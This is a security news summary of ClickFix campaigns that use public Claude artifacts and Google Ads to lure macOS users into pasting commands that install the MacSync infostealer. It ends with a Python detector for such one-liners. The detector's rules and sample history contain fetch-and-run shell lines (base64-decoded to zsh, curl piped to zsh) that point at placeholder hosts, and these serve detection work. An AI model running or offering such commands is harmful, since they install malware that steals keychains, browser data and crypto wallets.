Threat actors are abusing public Claude artifacts and malicious Google Ads in ClickFix campaigns to trick macOS users into pasting shell commands that install the MacSync infostealer. Researchers from Moonlock Lab and AdGuard observed multiple variants and thousands of views, with the same C2 infrastructure linking the activity to a single actor. #MacSync #Claude
Key points
- Malicious Google Search results direct users to public Claude artifacts or fake Apple Support pages that instruct users to run Terminal commands.
- At least two attack variants were seen, using commands like `echo "…" | base64 -D | zsh` and a curl-and-zsh payload download.
- Those commands install a loader for the MacSync infostealer, which uses AppleScript to steal keychains, browser data, and crypto wallets.
- Researchers noted thousands of views (12,300 to 15,600) of the malicious guides and observed both variants fetching a second stage from the same C2, suggesting one threat actor.
- Users should avoid running unfamiliar Terminal commands and verify command safety, for example by checking with a trusted tool or by asking the same LLM in the conversation.
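The two variants above share a shape a defender can look for in shell history or process command-line telemetry: a base64 blob decoded straight into a shell, or a curl/wget fetch piped into (or followed by) a shell. The following Python is an added example written for this summary, not code from Moonlock Lab, AdGuard, or the campaign itself; the rule names, the sample history lines and the `example.invalid` URLs are constructed here, and the decoder unwraps embedded base64 so that the first variant is classified by what its payload actually does rather than only by the `base64 -D | zsh` wrapper.

```python
"""Flag ClickFix-style macOS Terminal one-liners in shell history or
process command-line logs. Added example; rule names and sample lines
are constructed for illustration."""
import base64
import binascii
import re

# Shell names treated as an execution sink when fed through a pipe.
SHELL = r"(?:ba|z|k)?sh"

RULES = [
    # echo "<b64>" | base64 -D | zsh   (macOS base64 uses -D, GNU uses -d)
    ("base64-decode-to-shell",
     re.compile(rf"base64\s+(?:-D|-d|--decode)\b[^|]*\|\s*(?:sudo\s+)?{SHELL}\b")),
    # curl ... | zsh   or   wget ... | sh
    ("remote-fetch-to-shell",
     re.compile(rf"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?{SHELL}\b")),
    # curl -o /tmp/x ... && zsh /tmp/x   (download, then execute the file)
    ("fetch-then-execute",
     re.compile(rf"\b(?:curl|wget)\b.*?(?:;|&&)\s*(?:sudo\s+)?(?:{SHELL}|chmod\s+\+x)\b")),
]

# A run of base64 characters long enough to hold a command, with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_base64_literals(cmd: str) -> list[str]:
    """Return every base64 token in cmd that decodes to printable text."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # not base64, or binary garbage
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            out.append(text)
    return out


def analyze_command(cmd: str, depth: int = 0) -> list[str]:
    """Return the rule names that fire on cmd, plus any that fire on a
    base64 payload embedded in it (prefixed 'decoded:')."""
    hits = [name for name, rx in RULES if rx.search(cmd)]
    if depth < 2:  # unwrap at most two layers of encoding
        for inner in decoded_base64_literals(cmd):
            hits += [f"decoded:{h}" for h in analyze_command(inner, depth + 1)]
    return hits


def scan(lines: list[str]) -> dict[str, list[str]]:
    """Map each flagged line to its findings; clean lines are omitted."""
    results = {line: analyze_command(line) for line in lines}
    return {line: hits for line, hits in results.items() if hits}


# Constructed stage-two fetch, base64-wrapped the way the first variant does it.
STAGE2 = "curl -fsSL http://stage2.example.invalid/loader | zsh"
ENCODED = base64.b64encode(STAGE2.encode()).decode()

# Constructed shell-history lines: two modelled on the variants described,
# three benign ones that must not fire.
SAMPLE_HISTORY = [
    f'echo "{ENCODED}" | base64 -D | zsh',
    "curl -fsSL http://update.example.invalid/fix.sh | zsh",
    "ls -la ~/Library/Application\\ Support",
    "echo aGVsbG8gd29ybGQ= | base64 -D",  # decodes to text but is not executed
    "brew update && brew upgrade",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_HISTORY).items():
        print(f"{', '.join(hits):45s}  {line[:70]}")
```

Point `scan()` at `~/.zsh_history` lines or at the command-line field of EDR process events; the `decoded:` prefix tells an analyst that the finding came from inside an encoded payload, which is the part of the first variant worth preserving as evidence. The second-stage URL the real campaign used is not reproduced here.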